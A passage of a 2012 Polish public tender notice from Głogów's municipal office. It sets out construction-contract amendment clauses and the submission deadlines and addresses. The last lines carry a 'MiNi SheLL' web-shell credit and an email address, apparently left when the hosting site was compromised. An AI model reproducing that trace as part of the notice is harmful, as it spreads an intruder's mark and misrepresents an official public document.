e)	zmiany terminu dokonania odbiorów przewidzianych w Umowie.
8.6.Przedłużenie terminu wykonania Przedmiotu Umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie Przedmiotu Umowy w przypadku:
a)zawieszenia robót przez organy nadzoru budowlanego z przyczyn niezależnych od Wykonawcy,
b)wykopalisk uniemożliwiających wykonanie robót,
c)szczególnie niesprzyjających warunków  atmosferycznych uniemożliwiających prowadzenie robót budowlanych,  przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów,
d)siły wyższej, klęski żywiołowej
e)opóźnienia, utrudnienia lub przeszkody  spowodowane przez lub dających się przypisać Zamawiającemu lub innemu Wykonawcy zatrudnionemu  przez Zamawiającego na Terenie Budowy,
f)	niewypałów i niewybuchów,
g)	wykopalisk archeologicznych nieprzewidywanych w SIWZ,
h)	odmiennych od przyjętych w Dokumentacji Projektowej warunków  geologicznych (kategorie gruntu, kurzawka  itp.),
i)	odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów  infrastrukturalnych nieuwidocznionych na mapach do celów projektowych.
8.7.Zmiana terminu wykonania tj., rozpoczęcia i zakończenia przedmiotu umowy o czas opóźnienia, w przypadku wystąpienia przedłużającej się procedury badania i oceny ofert oraz procedury odwoławczej.
8.8.Zmiana terminu wykonania tj., rozpoczęcia i zakończenia przedmiotu umowy, gdy zaistnieje inna niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna, finansowa lub techniczna skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zmówienia .
8.9.Zmiana terminu wykonania wartości przedmiotu umowy w przypadku konieczności wykonania ewentualnych robót zamiennych, zamówień dodatkowych, uzupełniających.
8.10.Jeżeli wystąpią zmiany będące następstwem okoliczności leżących po stronie Zamawiającego , w szczególności :
a)wstrzymanie robót przez  Zamawiającego,
b)konieczności usunięcia błędów lub wprowadzenia zmian w Dokumentacji Projektowej.
8.11.Jeżeli powstaną okoliczności będące następstwem działania  organów administracji, w szczególności przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji,  zezwoleń  itp.,
8.12.Jeżeli powstanie konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych  rozwiązań technicznych/technologicznych  niż wskazane w Dokumentacji  Projektowej w szczególności:
a)w sytuacji, gdyby zastosowanie przewidzianych  rozwiązań  groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy, 
b)w przypadku konieczności zrealizowania  przedmiotu umowy przy  zastosowaniu innych  rozwiązań  technicznych/technologicznych  niż wskazane w Dokumentacji Projektowej w sytuacji, jeżeli rozwiązania te będą miały znaczący wpływ na obniżenie kosztów eksploatacji, poprawy bezpieczeństwa, które ze względu na postęp techniczno-technologiczny nie były znane w okresie opracowywania Dokumentacji Projektowej, ,
c)konieczności zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego  prawa.
           8.13.Zaistnieje zmiana stawki podatku VAT, która będzie powodować zmianę kosztów     wykonania po stronie Wykonawcy.
           8.14.Zaistnieje kolizja z planowanymi lub równolegle prowadzonymi przez inne  podmioty inwestycjami - w takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji, a  wynagrodzenie  zostanie  ustalone z zachowaniem  zasady opisanej w SIWZ i ofercie wykonawcy,
9. Zmiana Umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
a)opis zmiany,
b)uzasadnienie zmiany,
c)koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,,
d)czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.

10.Warunkiem wprowadzenia zmian do Umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. Inspektor Nadzoru oraz Kierownik budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Głogów, Rynek 10, 67-200 Głogów, pok. nr 314, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2012 godzina 10:00, miejsce: Urząd Miejski Głogów, Rynek 10, 67-200 Głogów, pok. nr 125, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com